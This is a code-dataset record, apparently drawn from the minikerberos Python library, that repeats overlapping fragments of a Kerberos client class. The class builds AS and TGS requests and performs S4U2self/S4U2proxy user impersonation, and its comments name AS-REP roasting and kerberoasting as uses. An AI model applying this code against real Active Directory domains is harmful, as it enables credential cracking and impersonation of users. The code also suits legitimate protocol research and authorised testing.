logger.debug('S4U2self invoked, but TGT is not available! Fetching TGT...')
self.get_TGT()
supp_enc = self.usercreds.get_preferred_enctype(supp_enc_methods)
auth_package_name = 'Kerberos'
now = datetime.datetime.utcnow()
###### Calculating authenticator data
authenticator_data = {}
authenticator_data['authenticator-vno'] = krb5_pvno
authenticator_data['crealm'] = Realm(self.kerberos_TGT['crealm'])
authenticator_data['cname'] = self.kerberos_TGT['cname']
authenticator_data['cusec'] = now.microsecond
authenticator_data['ctime'] = now
authenticator_data_enc = self.kerberos_cipher.encrypt(self.kerberos_session_key, 7, Authenticator(authenticator_data).dump(), None)
ap_req = {}
ap_req['pvno'] = krb5_pvno
ap_req['msg-type'] = MESSAGE_TYPE.KRB_AP_REQ.value
ap_req['ap-options'] = APOptions(set())
ap_req['ticket'] = Ticket(self.kerberos_TGT['ticket'])
ap_req['authenticator'] = EncryptedData({'etype': self.kerberos_cipher_type, 'cipher': authenticator_data_enc})
pa_data_auth = {}
pa_data_auth['padata-type'] = PaDataType.TGS_REQ.value
pa_data_auth['padata-value'] = AP_REQ(ap_req).dump()
###### Calculating checksum data
S4UByteArray = NAME_TYPE.PRINCIPAL.value.to_bytes(4, 'little', signed = False)
S4UByteArray += user_to_impersonate.username.encode()
S4UByteArray += user_to_impersonate.domain.encode()
S4UByteArray += auth_package_name.encode()
logger.debug('S4U2self: S4UByteArray: %s' % S4UByteArray.hex())
logger.debug('S4U2self: S4UByteArray: %s' % S4UByteArray)
chksum_data = _HMACMD5.checksum(self.kerberos_session_key, 17, S4UByteArray)
logger.debug('S4U2self: chksum_data: %s' % chksum_data.hex())
chksum = {}
chksum['cksumtype'] = int(CKSUMTYPE('HMAC_MD5'))
chksum['checksum'] = chksum_data
###### Filling out PA-FOR-USER data for impersonation
pa_for_user_enc = {}
pa_for_user_enc['userName'] = PrincipalName({'name-type': NAME_TYPE.PRINCIPAL.value, 'name-string': user_to_impersonate.get_principalname()})
pa_for_user_enc['userRealm'] = user_to_impersonate.domain
pa_for_user_enc['cksum'] = Checksum(chksum)
pa_for_user_enc['auth-package'] = auth_package_name
pa_for_user = {}
pa_for_user['padata-type'] = int(PADATA_TYPE('PA-FOR-USER'))
pa_for_user['padata-value'] = PA_FOR_USER_ENC(pa_for_user_enc).dump()
###### Constructing body
krb_tgs_body = {}
krb_tgs_body['kdc-options'] = KDCOptions(set(['forwardable','renewable','canonicalize']))
krb_tgs_body['sname'] = PrincipalName({'name-type': NAME_TYPE.UNKNOWN.value, 'name-string': [self.usercreds.username]})
krb_tgs_body['realm'] = self.usercreds.domain.upper()
krb_tgs_body['till'] = now + datetime.timedelta(days=1)
krb_tgs_body['nonce'] = secrets.randbits(31)
krb_tgs_body['etype'] = [supp_enc.value] #selecting according to server's preferences
krb_tgs_req = {}
krb_tgs_req['pvno'] = krb5_pvno
krb_tgs_req['msg-type'] = MESSAGE_TYPE.KRB_TGS_REQ.value
krb_tgs_req['padata'] = [pa_data_auth, pa_for_user]
krb_tgs_req['req-body'] = KDC_REQ_BODY(krb_tgs_body)
req = TGS_REQ(krb_tgs_req)
logger.debug('Sending S4U2self request to server')
try:
reply = self.ksoc.sendrecv(req.dump())
except KerberosError as e:
if e.errorcode.value == 16:
logger.error('S4U2self: Failed to get S4U2self! Error code (16) indicates that delegation is not enabled for this account! Full error: %s' % e)
raise e
logger.debug('Got S4U2self reply, decrypting...')
tgs = reply.native
encTGSRepPart = EncTGSRepPart.load(self.kerberos_cipher.decrypt(self.kerberos_session_key, 8, tgs['enc-part']['cipher'])).native
key = Key(encTGSRepPart['key']['keytype'], encTGSRepPart['key']['keyvalue'])
self.ccache.add_tgs(tgs, encTGSRepPart)
logger.debug('Got valid TGS reply')
self.kerberos_TGS = tgs
return tgs, encTGSRepPart, key
# https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-sfu/c920c148-8a9c-42e9-b8e9-db5755cd281b
def S4U2proxy(self, s4uself_ticket, spn_user, supp_enc_methods = [EncryptionType.DES_CBC_CRC,EncryptionType.DES_CBC_MD4,EncryptionType.DES_CBC_MD5,EncryptionType.DES3_CBC_SHA1,EncryptionType.ARCFOUR_HMAC_MD5,EncryptionType.AES256_CTS_HMAC_SHA1_96,EncryptionType.AES128_CTS_HMAC_SHA1_96]):
now = datetime.datetime.utcnow()
supp_enc = self.usercreds.get_preferred_enctype(supp_enc_methods)
pa_pac_opts = {}
pa_pac_opts['padata-type'] = int(PADATA_TYPE('PA-PAC-OPTIONS'))
pa_pac_opts['padata-value'] = PA_PAC_OPTIONS({'value' : PA_PAC_OPTIONSTypes(set(['resource-based constrained delegation']))}).dump()
authenticator_data = {}
authenticator_data['authenticator-vno'] = krb5_pvno
authenticator_data['crealm'] = Realm(self.kerberos_TGT['crealm'])
authenticator_data['cname'] = self.kerberos_TGT['cname']
authenticator_data['cusec'] = now.microsecond
authenticator_data['ctime'] = now
authenticator_data_enc = self.kerberos_cipher.encrypt(self.kerberos_session_key, 7, Authenticator(authenticator_data).dump(), None)
ap_req = {}
ap_req['pvno'] = krb5_pvno
ap_req['msg-type'] = MESSAGE_TYPE.KRB_AP_REQ.value
ap_req['ap-options'] = APOptions(set())
ap_req['ticket'] = Ticket(self.kerberos_TGT['ticket'])
ap_req['authenticator'] = EncryptedData({'etype': self.kerberos_cipher_type, 'cipher': authenticator_data_enc})
pa_tgs_req = {}
pa_tgs_req['padata-type'] = PaDataType.TGS_REQ.value
pa_tgs_req['padata-value'] = AP_REQ(ap_req).dump()
krb_tgs_body = {}
#krb_tgs_body['kdc-options'] = KDCOptions(set(['forwardable','forwarded','renewable','renewable-ok', 'canonicalize']))
krb_tgs_body['kdc-options'] = KDCOptions(set(['forwardable','renewable','constrained-delegation', 'canonicalize']))
krb_tgs_body['sname'] = PrincipalName({'name-type': NAME_TYPE.SRV_INST.value, 'name-string': spn_user.get_principalname()})
krb_tgs_body['realm'] = self.usercreds.domain.upper()
krb_tgs_body['till'] = now + datetime.timedelta(days=1)
krb_tgs_body['nonce'] = secrets.randbits(31)
krb_tgs_body['etype'] = [supp_enc.value] #selecting according to server's preferences
krb_tgs_body['additional-tickets'] = [s4uself_ticket]
krb_tgs_req = {}
krb_tgs_req['pvno'] = krb5_pvno
krb_tgs_req['msg-type'] = MESSAGE_TYPE.KRB_TGS_REQ.value
krb_tgs_req['padata'] = [pa_tgs_req, pa_pac_opts]
krb_tgs_req['req-body'] = KDC_REQ_BODY(krb_tgs_body)
req = TGS_REQ(krb_tgs_req)
try:
reply = self.ksoc.sendrecv(req.dump())
except KerberosError as e:
if e.errorcode.value == 16:
logger.error('S4U2proxy: Failed to get S4U2proxy! Error code (16) indicates that delegation is not enabled for this account! Full error: %s' % e)
raise e
def get_something(self, tgs, encTGSRepPart, sessionkey):
now = datetime.datetime.utcnow()
authenticator_data = {}
authenticator_data['authenticator-vno'] = krb5_pvno
authenticator_data['crealm'] = Realm(self.kerberos_TGT['crealm'])
authenticator_data['cname'] = self.kerberos_TGT['cname']
authenticator_data['cusec'] = now.microsecond
authenticator_data['ctime'] = now
print(encTGSRepPart['key']['keytype'])
cipher = _enctype_table[encTGSRepPart['key']['keytype']]
authenticator_data_enc = cipher.encrypt(sessionkey, 11, Authenticator(authenticator_data).dump(), None)
ap_req = {}
ap_req['pvno'] = krb5_pvno
ap_req['msg-type'] = MESSAGE_TYPE.KRB_AP_REQ.value
ap_req['ticket'] = Ticket(tgs['ticket'])
ap_req['ap-options'] = APOptions(set([]))
ap_req['authenticator'] = EncryptedData({'etype': self.kerberos_cipher_type, 'cipher': authenticator_data_enc})
return AP_REQ(ap_req).dump()
|
skelsec/minikerberos | minikerberos/communication.py | KerbrosComm.get_TGT | python | def get_TGT(self, override_etype = None, decrypt_tgt = True):
logger.debug('Generating initial TGT without authentication data')
now = datetime.datetime.utcnow()
kdc_req_body = {}
kdc_req_body['kdc-options'] = KDCOptions(set(['forwardable','renewable','proxiable']))
kdc_req_body['cname'] = PrincipalName({'name-type': NAME_TYPE.PRINCIPAL.value, 'name-string': [self.usercreds.username]})
kdc_req_body['realm'] = self.usercreds.domain.upper()
kdc_req_body['sname'] = PrincipalName({'name-type': NAME_TYPE.PRINCIPAL.value, 'name-string': ['krbtgt', self.usercreds.domain.upper()]})
kdc_req_body['till'] = now + datetime.timedelta(days=1)
kdc_req_body['rtime'] = now + datetime.timedelta(days=1)
kdc_req_body['nonce'] = secrets.randbits(31)
if override_etype is None:
kdc_req_body['etype'] = self.usercreds.get_supported_enctypes()
else:
kdc_req_body['etype'] = override_etype
pa_data_1 = {}
pa_data_1['padata-type'] = int(PADATA_TYPE('PA-PAC-REQUEST'))
pa_data_1['padata-value'] = PA_PAC_REQUEST({'include-pac': True}).dump()
kdc_req = {}
kdc_req['pvno'] = krb5_pvno
kdc_req['msg-type'] = MESSAGE_TYPE.KRB_AS_REQ.value
kdc_req['padata'] = [pa_data_1]
kdc_req['req-body'] = KDC_REQ_BODY(kdc_req_body)
req = AS_REQ(kdc_req)
logger.debug('Sending initial TGT to %s' % self.ksoc.get_addr_str())
rep = self.ksoc.sendrecv(req.dump(), throw = False)
if rep.name != 'KRB_ERROR':
#user can do kerberos auth without preauthentication!
self.kerberos_TGT = rep.native
#if we want to roast the asrep (tgt rep) part then we dont even have the proper keys to decrypt
#so we just return, the asrep can be extracted from this object anyhow
if decrypt_tgt == False:
return
self.kerberos_cipher = _enctype_table[23]
self.kerberos_cipher_type = 23
self.kerberos_key = Key(self.kerberos_cipher.enctype, self.usercreds.get_key_for_enctype(EncryptionType.ARCFOUR_HMAC_MD5))
else:
if rep.native['error-code'] != KerberosErrorCode.KDC_ERR_PREAUTH_REQUIRED.value:
raise KerberosError(rep)
rep = rep.native
logger.debug('Got reply from server, asikg to provide auth data')
rep = self.do_preauth(rep)
logger.debug('Got valid TGT response from server')
rep = rep.native
self.kerberos_TGT = rep
cipherText = rep['enc-part']['cipher']
temp = self.kerberos_cipher.decrypt(self.kerberos_key, 3, cipherText)
self.kerberos_TGT_encpart = EncASRepPart.load(temp).native
self.kerberos_session_key = Key(self.kerberos_cipher.enctype, self.kerberos_TGT_encpart['key']['keyvalue'])
self.ccache.add_tgt(self.kerberos_TGT, self.kerberos_TGT_encpart, override_pp = True)
logger.debug('Got valid TGT')
return | decrypt_tgt: used for asreproast attacks
Steps performed:
1. Send and empty (no encrypted timestamp) AS_REQ with all the encryption types we support
2. Depending on the response (either error or AS_REP with TGT) we either send another AS_REQ with the encrypted data or return the TGT (or fail miserably)
3. PROFIT | train | https://github.com/skelsec/minikerberos/blob/caf14c1d0132119d6e8a8f05120efb7d0824b2c6/minikerberos/communication.py#L215-L285 | [
"def add_tgt(self, as_rep, enc_as_rep_part, override_pp = True): #from AS_REP\n\t\"\"\"\n\tCreates credential object from the TGT and adds to the ccache file\n\tThe TGT is basically the native representation of the asn1 encoded AS_REP data that the AD sends upon a succsessful TGT request.\n\n\tThis function doesn't... | class KerbrosComm:
def __init__(self,ccred, ksoc, ccache = None):
self.usercreds = ccred
self.ksoc = ksoc
self.user_ccache = ccache
self.ccache = CCACHE()
self.kerberos_session_key = None
self.kerberos_TGT = None
self.kerberos_TGT_encpart = None
self.kerberos_TGS = None
self.kerberos_cipher = None
self.kerberos_cipher_type = None
self.kerberos_key = None
@staticmethod
def from_tgt(ksoc, tgt, key):
"""
Sets up the kerberos object from tgt and the session key.
Use this function when pulling the TGT from ccache file.
"""
kc = KerbrosComm(None, ksoc)
kc.kerberos_TGT = tgt
kc.kerberos_cipher_type = key['keytype']
kc.kerberos_session_key = Key(kc.kerberos_cipher_type, key['keyvalue'])
kc.kerberos_cipher = _enctype_table[kc.kerberos_cipher_type]
return kc
def do_preauth(self, rep):
#now getting server's supported encryption methods
supp_enc_methods = collections.OrderedDict()
for enc_method in METHOD_DATA.load(rep['e-data']).native:
data_type = PaDataType(enc_method['padata-type'])
if data_type == PaDataType.ETYPE_INFO or data_type == PaDataType.ETYPE_INFO2:
if data_type == PaDataType.ETYPE_INFO:
enc_info_list = ETYPE_INFO.load(enc_method['padata-value'])
elif data_type == PaDataType.ETYPE_INFO2:
enc_info_list = ETYPE_INFO2.load(enc_method['padata-value'])
for enc_info in enc_info_list.native:
supp_enc_methods[EncryptionType(enc_info['etype'])] = enc_info['salt']
logger.debug('Server supports encryption type %s with salt %s' % (EncryptionType(enc_info['etype']).name, enc_info['salt']))
logger.debug('Constructing TGT request with auth data')
#now to create an AS_REQ with encrypted timestamp for authentication
pa_data_1 = {}
pa_data_1['padata-type'] = int(PADATA_TYPE('PA-PAC-REQUEST'))
pa_data_1['padata-value'] = PA_PAC_REQUEST({'include-pac': True}).dump()
now = datetime.datetime.utcnow()
#creating timestamp asn1
timestamp = PA_ENC_TS_ENC({'patimestamp': now, 'pausec': now.microsecond}).dump()
supp_enc = self.usercreds.get_preferred_enctype(supp_enc_methods)
logger.debug('Selecting common encryption type: %s' % supp_enc.name)
self.kerberos_cipher = _enctype_table[supp_enc.value]
self.kerberos_cipher_type = supp_enc.value
self.kerberos_key = Key(self.kerberos_cipher.enctype, self.usercreds.get_key_for_enctype(supp_enc))
enc_timestamp = self.kerberos_cipher.encrypt(self.kerberos_key, 1, timestamp, None)
pa_data_2 = {}
pa_data_2['padata-type'] = int(PADATA_TYPE('ENC-TIMESTAMP'))
pa_data_2['padata-value'] = EncryptedData({'etype': supp_enc.value, 'cipher': enc_timestamp}).dump()
kdc_req_body = {}
kdc_req_body['kdc-options'] = KDCOptions(set(['forwardable','renewable','proxiable']))
kdc_req_body['cname'] = PrincipalName({'name-type': NAME_TYPE.PRINCIPAL.value, 'name-string': [self.usercreds.username]})
kdc_req_body['realm'] = self.usercreds.domain.upper()
kdc_req_body['sname'] = PrincipalName({'name-type': NAME_TYPE.PRINCIPAL.value, 'name-string': ['krbtgt', self.usercreds.domain.upper()]})
kdc_req_body['till'] = now + datetime.timedelta(days=1)
kdc_req_body['rtime'] = now + datetime.timedelta(days=1)
kdc_req_body['nonce'] = secrets.randbits(31)
kdc_req_body['etype'] = [supp_enc.value] #selecting according to server's preferences
kdc_req = {}
kdc_req['pvno'] = krb5_pvno
kdc_req['msg-type'] = MESSAGE_TYPE.KRB_AS_REQ.value
kdc_req['padata'] = [pa_data_2,pa_data_1]
kdc_req['req-body'] = KDC_REQ_BODY(kdc_req_body)
req = AS_REQ(kdc_req)
logger.debug('Sending TGT request to server')
return self.ksoc.sendrecv(req.dump())
def get_TGT(self, override_etype = None, decrypt_tgt = True):
"""
decrypt_tgt: used for asreproast attacks
Steps performed:
1. Send and empty (no encrypted timestamp) AS_REQ with all the encryption types we support
2. Depending on the response (either error or AS_REP with TGT) we either send another AS_REQ with the encrypted data or return the TGT (or fail miserably)
3. PROFIT
"""
logger.debug('Generating initial TGT without authentication data')
now = datetime.datetime.utcnow()
kdc_req_body = {}
kdc_req_body['kdc-options'] = KDCOptions(set(['forwardable','renewable','proxiable']))
kdc_req_body['cname'] = PrincipalName({'name-type': NAME_TYPE.PRINCIPAL.value, 'name-string': [self.usercreds.username]})
kdc_req_body['realm'] = self.usercreds.domain.upper()
kdc_req_body['sname'] = PrincipalName({'name-type': NAME_TYPE.PRINCIPAL.value, 'name-string': ['krbtgt', self.usercreds.domain.upper()]})
kdc_req_body['till'] = now + datetime.timedelta(days=1)
kdc_req_body['rtime'] = now + datetime.timedelta(days=1)
kdc_req_body['nonce'] = secrets.randbits(31)
if override_etype is None:
kdc_req_body['etype'] = self.usercreds.get_supported_enctypes()
else:
kdc_req_body['etype'] = override_etype
pa_data_1 = {}
pa_data_1['padata-type'] = int(PADATA_TYPE('PA-PAC-REQUEST'))
pa_data_1['padata-value'] = PA_PAC_REQUEST({'include-pac': True}).dump()
kdc_req = {}
kdc_req['pvno'] = krb5_pvno
kdc_req['msg-type'] = MESSAGE_TYPE.KRB_AS_REQ.value
kdc_req['padata'] = [pa_data_1]
kdc_req['req-body'] = KDC_REQ_BODY(kdc_req_body)
req = AS_REQ(kdc_req)
logger.debug('Sending initial TGT to %s' % self.ksoc.get_addr_str())
rep = self.ksoc.sendrecv(req.dump(), throw = False)
if rep.name != 'KRB_ERROR':
#user can do kerberos auth without preauthentication!
self.kerberos_TGT = rep.native
#if we want to roast the asrep (tgt rep) part then we dont even have the proper keys to decrypt
#so we just return, the asrep can be extracted from this object anyhow
if decrypt_tgt == False:
return
self.kerberos_cipher = _enctype_table[23]
self.kerberos_cipher_type = 23
self.kerberos_key = Key(self.kerberos_cipher.enctype, self.usercreds.get_key_for_enctype(EncryptionType.ARCFOUR_HMAC_MD5))
else:
if rep.native['error-code'] != KerberosErrorCode.KDC_ERR_PREAUTH_REQUIRED.value:
raise KerberosError(rep)
rep = rep.native
logger.debug('Got reply from server, asikg to provide auth data')
rep = self.do_preauth(rep)
logger.debug('Got valid TGT response from server')
rep = rep.native
self.kerberos_TGT = rep
cipherText = rep['enc-part']['cipher']
temp = self.kerberos_cipher.decrypt(self.kerberos_key, 3, cipherText)
self.kerberos_TGT_encpart = EncASRepPart.load(temp).native
self.kerberos_session_key = Key(self.kerberos_cipher.enctype, self.kerberos_TGT_encpart['key']['keyvalue'])
self.ccache.add_tgt(self.kerberos_TGT, self.kerberos_TGT_encpart, override_pp = True)
logger.debug('Got valid TGT')
return
def get_TGS(self, spn_user, override_etype = None):
"""
Requests a TGS ticket for the specified user.
Retruns the TGS ticket, end the decrpyted encTGSRepPart.
spn_user: KerberosTarget: the service user you want to get TGS for.
override_etype: None or list of etype values (int) Used mostly for kerberoasting, will override the AP_REQ supported etype values (which is derived from the TGT) to be able to recieve whatever tgs tiecket
"""
#construct tgs_req
logger.debug('Constructing TGS request for user %s' % spn_user.get_formatted_pname())
now = datetime.datetime.utcnow()
kdc_req_body = {}
kdc_req_body['kdc-options'] = KDCOptions(set(['forwardable','renewable','renewable_ok', 'canonicalize']))
kdc_req_body['realm'] = spn_user.domain.upper()
kdc_req_body['sname'] = PrincipalName({'name-type': NAME_TYPE.SRV_INST.value, 'name-string': spn_user.get_principalname()})
kdc_req_body['till'] = now + datetime.timedelta(days=1)
kdc_req_body['nonce'] = secrets.randbits(31)
if override_etype:
kdc_req_body['etype'] = override_etype
else:
kdc_req_body['etype'] = [self.kerberos_cipher_type]
authenticator_data = {}
authenticator_data['authenticator-vno'] = krb5_pvno
authenticator_data['crealm'] = Realm(self.kerberos_TGT['crealm'])
authenticator_data['cname'] = self.kerberos_TGT['cname']
authenticator_data['cusec'] = now.microsecond
authenticator_data['ctime'] = now
authenticator_data_enc = self.kerberos_cipher.encrypt(self.kerberos_session_key, 7, Authenticator(authenticator_data).dump(), None)
ap_req = {}
ap_req['pvno'] = krb5_pvno
ap_req['msg-type'] = MESSAGE_TYPE.KRB_AP_REQ.value
ap_req['ap-options'] = APOptions(set())
ap_req['ticket'] = Ticket(self.kerberos_TGT['ticket'])
ap_req['authenticator'] = EncryptedData({'etype': self.kerberos_cipher_type, 'cipher': authenticator_data_enc})
pa_data_1 = {}
pa_data_1['padata-type'] = PaDataType.TGS_REQ.value
pa_data_1['padata-value'] = AP_REQ(ap_req).dump()
kdc_req = {}
kdc_req['pvno'] = krb5_pvno
kdc_req['msg-type'] = MESSAGE_TYPE.KRB_TGS_REQ.value
kdc_req['padata'] = [pa_data_1]
kdc_req['req-body'] = KDC_REQ_BODY(kdc_req_body)
req = TGS_REQ(kdc_req)
logger.debug('Constructing TGS request to server')
rep = self.ksoc.sendrecv(req.dump())
logger.debug('Got TGS reply, decrypting...')
tgs = rep.native
encTGSRepPart = EncTGSRepPart.load(self.kerberos_cipher.decrypt(self.kerberos_session_key, 8, tgs['enc-part']['cipher'])).native
key = Key(encTGSRepPart['key']['keytype'], encTGSRepPart['key']['keyvalue'])
self.ccache.add_tgs(tgs, encTGSRepPart)
logger.debug('Got valid TGS reply')
self.kerberos_TGS = tgs
return tgs, encTGSRepPart, key
#https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-sfu/6a8dfc0c-2d32-478a-929f-5f9b1b18a169
def S4U2self(self, user_to_impersonate, supp_enc_methods = [EncryptionType.DES_CBC_CRC,EncryptionType.DES_CBC_MD4,EncryptionType.DES_CBC_MD5,EncryptionType.DES3_CBC_SHA1,EncryptionType.ARCFOUR_HMAC_MD5,EncryptionType.AES256_CTS_HMAC_SHA1_96,EncryptionType.AES128_CTS_HMAC_SHA1_96]):
#def S4U2self(self, user_to_impersonate, spn_user, supp_enc_methods = [EncryptionType.DES_CBC_CRC,EncryptionType.DES_CBC_MD4,EncryptionType.DES_CBC_MD5,EncryptionType.DES3_CBC_SHA1,EncryptionType.ARCFOUR_HMAC_MD5,EncryptionType.AES256_CTS_HMAC_SHA1_96,EncryptionType.AES128_CTS_HMAC_SHA1_96]):
"""
user_to_impersonate : KerberosTarget class
"""
if not self.kerberos_TGT:
logger.debug('S4U2self invoked, but TGT is not available! Fetching TGT...')
self.get_TGT()
supp_enc = self.usercreds.get_preferred_enctype(supp_enc_methods)
auth_package_name = 'Kerberos'
now = datetime.datetime.utcnow()
###### Calculating authenticator data
authenticator_data = {}
authenticator_data['authenticator-vno'] = krb5_pvno
authenticator_data['crealm'] = Realm(self.kerberos_TGT['crealm'])
authenticator_data['cname'] = self.kerberos_TGT['cname']
authenticator_data['cusec'] = now.microsecond
authenticator_data['ctime'] = now
authenticator_data_enc = self.kerberos_cipher.encrypt(self.kerberos_session_key, 7, Authenticator(authenticator_data).dump(), None)
ap_req = {}
ap_req['pvno'] = krb5_pvno
ap_req['msg-type'] = MESSAGE_TYPE.KRB_AP_REQ.value
ap_req['ap-options'] = APOptions(set())
ap_req['ticket'] = Ticket(self.kerberos_TGT['ticket'])
ap_req['authenticator'] = EncryptedData({'etype': self.kerberos_cipher_type, 'cipher': authenticator_data_enc})
pa_data_auth = {}
pa_data_auth['padata-type'] = PaDataType.TGS_REQ.value
pa_data_auth['padata-value'] = AP_REQ(ap_req).dump()
###### Calculating checksum data
S4UByteArray = NAME_TYPE.PRINCIPAL.value.to_bytes(4, 'little', signed = False)
S4UByteArray += user_to_impersonate.username.encode()
S4UByteArray += user_to_impersonate.domain.encode()
S4UByteArray += auth_package_name.encode()
logger.debug('S4U2self: S4UByteArray: %s' % S4UByteArray.hex())
logger.debug('S4U2self: S4UByteArray: %s' % S4UByteArray)
chksum_data = _HMACMD5.checksum(self.kerberos_session_key, 17, S4UByteArray)
logger.debug('S4U2self: chksum_data: %s' % chksum_data.hex())
chksum = {}
chksum['cksumtype'] = int(CKSUMTYPE('HMAC_MD5'))
chksum['checksum'] = chksum_data
###### Filling out PA-FOR-USER data for impersonation
pa_for_user_enc = {}
pa_for_user_enc['userName'] = PrincipalName({'name-type': NAME_TYPE.PRINCIPAL.value, 'name-string': user_to_impersonate.get_principalname()})
pa_for_user_enc['userRealm'] = user_to_impersonate.domain
pa_for_user_enc['cksum'] = Checksum(chksum)
pa_for_user_enc['auth-package'] = auth_package_name
pa_for_user = {}
pa_for_user['padata-type'] = int(PADATA_TYPE('PA-FOR-USER'))
pa_for_user['padata-value'] = PA_FOR_USER_ENC(pa_for_user_enc).dump()
###### Constructing body
krb_tgs_body = {}
krb_tgs_body['kdc-options'] = KDCOptions(set(['forwardable','renewable','canonicalize']))
krb_tgs_body['sname'] = PrincipalName({'name-type': NAME_TYPE.UNKNOWN.value, 'name-string': [self.usercreds.username]})
krb_tgs_body['realm'] = self.usercreds.domain.upper()
krb_tgs_body['till'] = now + datetime.timedelta(days=1)
krb_tgs_body['nonce'] = secrets.randbits(31)
krb_tgs_body['etype'] = [supp_enc.value] #selecting according to server's preferences
krb_tgs_req = {}
krb_tgs_req['pvno'] = krb5_pvno
krb_tgs_req['msg-type'] = MESSAGE_TYPE.KRB_TGS_REQ.value
krb_tgs_req['padata'] = [pa_data_auth, pa_for_user]
krb_tgs_req['req-body'] = KDC_REQ_BODY(krb_tgs_body)
req = TGS_REQ(krb_tgs_req)
logger.debug('Sending S4U2self request to server')
try:
reply = self.ksoc.sendrecv(req.dump())
except KerberosError as e:
if e.errorcode.value == 16:
logger.error('S4U2self: Failed to get S4U2self! Error code (16) indicates that delegation is not enabled for this account! Full error: %s' % e)
raise e
logger.debug('Got S4U2self reply, decrypting...')
tgs = reply.native
encTGSRepPart = EncTGSRepPart.load(self.kerberos_cipher.decrypt(self.kerberos_session_key, 8, tgs['enc-part']['cipher'])).native
key = Key(encTGSRepPart['key']['keytype'], encTGSRepPart['key']['keyvalue'])
self.ccache.add_tgs(tgs, encTGSRepPart)
logger.debug('Got valid TGS reply')
self.kerberos_TGS = tgs
return tgs, encTGSRepPart, key
# https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-sfu/c920c148-8a9c-42e9-b8e9-db5755cd281b
def S4U2proxy(self, s4uself_ticket, spn_user, supp_enc_methods = [EncryptionType.DES_CBC_CRC,EncryptionType.DES_CBC_MD4,EncryptionType.DES_CBC_MD5,EncryptionType.DES3_CBC_SHA1,EncryptionType.ARCFOUR_HMAC_MD5,EncryptionType.AES256_CTS_HMAC_SHA1_96,EncryptionType.AES128_CTS_HMAC_SHA1_96]):
now = datetime.datetime.utcnow()
supp_enc = self.usercreds.get_preferred_enctype(supp_enc_methods)
pa_pac_opts = {}
pa_pac_opts['padata-type'] = int(PADATA_TYPE('PA-PAC-OPTIONS'))
pa_pac_opts['padata-value'] = PA_PAC_OPTIONS({'value' : PA_PAC_OPTIONSTypes(set(['resource-based constrained delegation']))}).dump()
authenticator_data = {}
authenticator_data['authenticator-vno'] = krb5_pvno
authenticator_data['crealm'] = Realm(self.kerberos_TGT['crealm'])
authenticator_data['cname'] = self.kerberos_TGT['cname']
authenticator_data['cusec'] = now.microsecond
authenticator_data['ctime'] = now
authenticator_data_enc = self.kerberos_cipher.encrypt(self.kerberos_session_key, 7, Authenticator(authenticator_data).dump(), None)
ap_req = {}
ap_req['pvno'] = krb5_pvno
ap_req['msg-type'] = MESSAGE_TYPE.KRB_AP_REQ.value
ap_req['ap-options'] = APOptions(set())
ap_req['ticket'] = Ticket(self.kerberos_TGT['ticket'])
ap_req['authenticator'] = EncryptedData({'etype': self.kerberos_cipher_type, 'cipher': authenticator_data_enc})
pa_tgs_req = {}
pa_tgs_req['padata-type'] = PaDataType.TGS_REQ.value
pa_tgs_req['padata-value'] = AP_REQ(ap_req).dump()
krb_tgs_body = {}
#krb_tgs_body['kdc-options'] = KDCOptions(set(['forwardable','forwarded','renewable','renewable-ok', 'canonicalize']))
krb_tgs_body['kdc-options'] = KDCOptions(set(['forwardable','renewable','constrained-delegation', 'canonicalize']))
krb_tgs_body['sname'] = PrincipalName({'name-type': NAME_TYPE.SRV_INST.value, 'name-string': spn_user.get_principalname()})
krb_tgs_body['realm'] = self.usercreds.domain.upper()
krb_tgs_body['till'] = now + datetime.timedelta(days=1)
krb_tgs_body['nonce'] = secrets.randbits(31)
krb_tgs_body['etype'] = [supp_enc.value] #selecting according to server's preferences
krb_tgs_body['additional-tickets'] = [s4uself_ticket]
krb_tgs_req = {}
krb_tgs_req['pvno'] = krb5_pvno
krb_tgs_req['msg-type'] = MESSAGE_TYPE.KRB_TGS_REQ.value
krb_tgs_req['padata'] = [pa_tgs_req, pa_pac_opts]
krb_tgs_req['req-body'] = KDC_REQ_BODY(krb_tgs_body)
req = TGS_REQ(krb_tgs_req)
try:
reply = self.ksoc.sendrecv(req.dump())
except KerberosError as e:
if e.errorcode.value == 16:
logger.error('S4U2proxy: Failed to get S4U2proxy! Error code (16) indicates that delegation is not enabled for this account! Full error: %s' % e)
raise e
def get_something(self, tgs, encTGSRepPart, sessionkey):
now = datetime.datetime.utcnow()
authenticator_data = {}
authenticator_data['authenticator-vno'] = krb5_pvno
authenticator_data['crealm'] = Realm(self.kerberos_TGT['crealm'])
authenticator_data['cname'] = self.kerberos_TGT['cname']
authenticator_data['cusec'] = now.microsecond
authenticator_data['ctime'] = now
print(encTGSRepPart['key']['keytype'])
cipher = _enctype_table[encTGSRepPart['key']['keytype']]
authenticator_data_enc = cipher.encrypt(sessionkey, 11, Authenticator(authenticator_data).dump(), None)
ap_req = {}
ap_req['pvno'] = krb5_pvno
ap_req['msg-type'] = MESSAGE_TYPE.KRB_AP_REQ.value
ap_req['ticket'] = Ticket(tgs['ticket'])
ap_req['ap-options'] = APOptions(set([]))
ap_req['authenticator'] = EncryptedData({'etype': self.kerberos_cipher_type, 'cipher': authenticator_data_enc})
return AP_REQ(ap_req).dump()
|
skelsec/minikerberos | minikerberos/communication.py | KerbrosComm.get_TGS | python | def get_TGS(self, spn_user, override_etype = None):
#construct tgs_req
logger.debug('Constructing TGS request for user %s' % spn_user.get_formatted_pname())
now = datetime.datetime.utcnow()
kdc_req_body = {}
kdc_req_body['kdc-options'] = KDCOptions(set(['forwardable','renewable','renewable_ok', 'canonicalize']))
kdc_req_body['realm'] = spn_user.domain.upper()
kdc_req_body['sname'] = PrincipalName({'name-type': NAME_TYPE.SRV_INST.value, 'name-string': spn_user.get_principalname()})
kdc_req_body['till'] = now + datetime.timedelta(days=1)
kdc_req_body['nonce'] = secrets.randbits(31)
if override_etype:
kdc_req_body['etype'] = override_etype
else:
kdc_req_body['etype'] = [self.kerberos_cipher_type]
authenticator_data = {}
authenticator_data['authenticator-vno'] = krb5_pvno
authenticator_data['crealm'] = Realm(self.kerberos_TGT['crealm'])
authenticator_data['cname'] = self.kerberos_TGT['cname']
authenticator_data['cusec'] = now.microsecond
authenticator_data['ctime'] = now
authenticator_data_enc = self.kerberos_cipher.encrypt(self.kerberos_session_key, 7, Authenticator(authenticator_data).dump(), None)
ap_req = {}
ap_req['pvno'] = krb5_pvno
ap_req['msg-type'] = MESSAGE_TYPE.KRB_AP_REQ.value
ap_req['ap-options'] = APOptions(set())
